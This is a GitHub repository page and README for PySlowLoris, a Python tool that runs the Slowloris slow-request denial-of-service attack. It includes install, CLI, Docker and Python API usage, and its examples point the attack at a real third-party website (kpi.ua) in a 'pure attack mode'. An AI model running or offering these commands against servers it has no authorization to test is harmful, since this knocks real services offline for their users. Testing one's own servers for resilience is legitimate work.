Skip to content

maxkrivich/SlowLoris

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

106 Commits

.github

.github

 
 

httpd_test

httpd_test

 
 

pyslowloris

pyslowloris

 
 

tests

tests

 
 

.dockerignore

.dockerignore

 
 

.flake8

.flake8

 
 

.gitignore

.gitignore

 
 

CODE_OF_CONDUCT.md

CODE_OF_CONDUCT.md

 
 

Dockerfile

Dockerfile

 
 

LICENSE

LICENSE

 
 

Makefile

Makefile

 
 

README.md

README.md

 
 

docker-compose.yml

docker-compose.yml

 
 

poetry.lock

poetry.lock

 
 

pyproject.toml

pyproject.toml

 
 

Repository files navigation

PySlowLoris

Gitter chat License Python Build Status PyPI version

PySlowLoris is a tool for testing if your web server is vulnerable to slow-requests kind of attacks. The module is based on python-trio for Asynchronous I/O and poetry for dependency management. The idea behind this approach to create as many connections with a server as possible and keep them alive and send trash headers through the connection. Please DO NOT use this in the real attacks on the servers.

More information about the attack you can find here.

Installation

PyPi

For installation through the PyPI:

$ pip install pyslowloris==2.0.1

This method is prefered for installation of the most recent stable release.

Source-code

For installation through the source-code for local development:

$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ pip install poetry
$ pyenv install 3.8.3
$ pyenv local 3.8.3
$ poetry env use 3.8.3

Basic Usage

Available command list:

$ slowloris --help
usage: slowloris [-h] -u URL [-c CONNECTION_COUNT] [-s]

Asynchronous Python implementation of SlowLoris attack

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Link to a web server (http://google.com) - str
  -c CONNECTION_COUNT, --connection-count CONNECTION_COUNT
                        Count of active connections (default value is 247) - int
  -s, --silent          Ignore all of the errors [pure attack mode] - bool

Docker usage

Download image from Docker Hub

Pull the image from Docker Hub and run a container:

$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]

Build image from source-code

Also you can build image from Dockerfile and run a container:

$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]

Note: Don't forget about 'sudo'!

Example of usage

How to use module through Python API

Here is an example of usage

from pyslowloris import HostAddress, SlowLorisAttack

url = HostAddress.from_url("http://kpi.ua")
connections_count = 100

loris = SlowLorisAttack(url, connections_count, silent=True)
loris.start()

How to use module via CLI

The following command helps to use module from command line

$ slowloris -u http://kpi.ua/ -c 100 -s
stop execution: Ctrl + C

Testing

Testing with real apache server

$ docker-compose up web_server -d
$ .....

Module-tests

$ make pytest

Bugs, issues and contributing

If you find bugs or have suggestions about improving the module, don't hesitate to contact me.

License

This project is licensed under the MIT License - see the LICENSE file for details

Copyright (c) 2017-2020 Maxim Krivich

About

Asynchronous Python implementation of SlowLoris DoS attack

pypi.org/project/PySlowLoris/

Topics

security dos exploit apache hacking python3 cybersecurity vulnerability denial-of-service hacker-scripts information-security slow-requests cyber-security hacking-tool slowloris dos-tool

Resources

Readme

License

MIT license

Code of conduct

Code of conduct
Activity

Stars

96 stars

Watchers

10 watching

Forks

38 forks
Report repository

Releases 3

Update depencencies Latest
Jul 25, 2023
+ 2 releases

Contributors 7

Languages